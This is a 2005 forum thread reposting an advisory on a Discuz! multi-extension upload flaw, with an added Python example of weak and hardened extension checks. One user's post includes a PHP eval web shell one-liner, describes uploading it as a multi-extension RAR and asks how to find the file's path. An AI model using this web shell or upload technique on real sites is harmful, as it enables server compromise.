[Repost] Discuz attachment file download path retrieval and multi-extension RAR arbitrary command execution vulnerability

Source: Evil Octal Information Security Team (www.eviloctal.com)

Discuz! - "popular web forum applications in China".

Due to an input validation flaw, malicious attackers can cause the Discuz program to run arbitrary commands with the privilege of the HTTPD process.
  
Credit:
The information has been provided by SSR Team.  
  
Details
Vulnerable Systems:
* Discuz! version 4.0.0 rc4 and prior

Discuz! doesn't properly check multiple extensions of uploaded files, allowing malicious attackers to upload a file with multiple extensions such as attach.php.php.php.php.rar to a web server.

This can be exploited to run arbitrary commands with the privilege of the HTTPD process, which is typically run as the nobody user.

Workaround:
Exclude the RAR extension from the extension list for attached files on an administration page and wait for the release of the official patch.

Disclosure Timeline:
* 24.07.05 - Vulnerability found
* 25.07.05 - Vendor notified
* 12.08.05 - Official release  
This is the vulnerability advisory I saw on the site http://www.securiteam.com/unixfocus/5WP0F1FGKG.html.
I immediately tested it locally, and it proved possible to execute arbitrary commands: I saved <?php eval($_POST[cmd]);?>
as cmd.php, packed it into p11.php.php.php.php.php.php.php.php.php.php.php.php.rar,
and uploaded it to the forum, where it was renamed to p11.php.php.php.php.php.php.php.php.php.php.php.php_6nOXtmZPWv90.rar.
You can see that the filename has been changed, but you cannot see this later filename yourself, so you do not have the path either.
Packet capture and sniffing could not find the file path. Then I went into the admin backend, Attachment Management, where the filename can be viewed, and by connecting with the lanker trojan client
commands could be executed. The difficulty is how to get the upload file path; I tried hard last night and still could not obtain the path.
I have visited EST before, but mostly lurked; now I finally have a question to raise. I am a newbie, and I ask for help here.
Vulnerable Systems:
* Discuz! version 4.0.0 rc4 and prior; the vulnerability is extremely widespread, and Discuz's anti-hotlinking technology is good too,
so exploiting this vulnerability is really not something a newbie like me can pull off; I am still studying the code.
k4u at 1984 http://spaces.msn.com/members/k4u1984/

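The check described under Details, as an added illustration that is not Discuz! code: the advisory's sample filename passes a check that looks only at the final extension, while a check over every extension rejects it (under Apache's mod_mime, a handler mapped to `.php` applies to any file whose name carries `.php` anywhere among its extensions). `SCRIPT_EXTENSIONS`, `ALLOWED` and the function names are assumptions made for the demonstration.

```python
import secrets

# Extensions a typical Apache/PHP deployment maps to a script handler (assumed
# list). mod_mime applies a handler added for ".php" to any file whose name
# carries ".php" anywhere among its extensions, so "attach.php.php.php.php.rar"
# is executed as PHP even though its final extension is .rar.
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phps", "cgi", "pl", "sh"}

# Administrator's allowed attachment extensions (assumed, for the demonstration).
ALLOWED = {"rar", "zip", "jpg", "gif", "png", "txt"}


def last_extension_only(filename: str, allowed: set) -> bool:
    """The weak check the advisory describes: only the text after the final
    dot is compared against the allowed list; every earlier extension is ignored."""
    if "." not in filename:
        return False
    return filename.rsplit(".", 1)[1].lower() in allowed


def every_extension(filename: str, allowed: set) -> bool:
    """Hardened check: the last extension must be allowed, no other extension
    may be one a script handler is mapped to, and the base name may not be
    empty (this also rejects dotfiles such as ".htaccess")."""
    parts = filename.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False
    exts = parts[1:]
    if exts[-1] not in allowed:
        return False
    return not any(ext in SCRIPT_EXTENSIONS for ext in exts)


def stored_name(filename: str, allowed: set) -> str:
    """Name under which a validated upload is stored. The user-supplied base
    name is discarded entirely instead of being kept in front of a random
    token, so the stored file has exactly one extension and the upload-time
    policy still holds for the name on disk."""
    if not every_extension(filename, allowed):
        raise ValueError(f"upload rejected: {filename!r}")
    ext = filename.lower().rsplit(".", 1)[1]
    return f"{secrets.token_hex(8)}.{ext}"
```

The advisory's workaround (removing RAR from the allowed list) blocks the sample even with the weak check, but only the hardened check also stops the same trick with any other allowed extension.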

Quote:
The following quotes the post [Repost] Discuz attachment file download path retrieval and multi-extension RAR arbitrary command execution vulnerability, made by k4u on 2005-08-19 14:26:
Source: Evil Octal Information Security Team (www.eviloctal.com)

Discuz! - "popular web forum applications in China".

Due to input validation flaw, malicious attackers can cause the Discuz program to run arbitrary commands with the privilege of the HTTPD process.  
.......
44444


This vulnerability is too much trouble: you only get httpd privileges, it will wear you out.


It seems this can only be guessed.
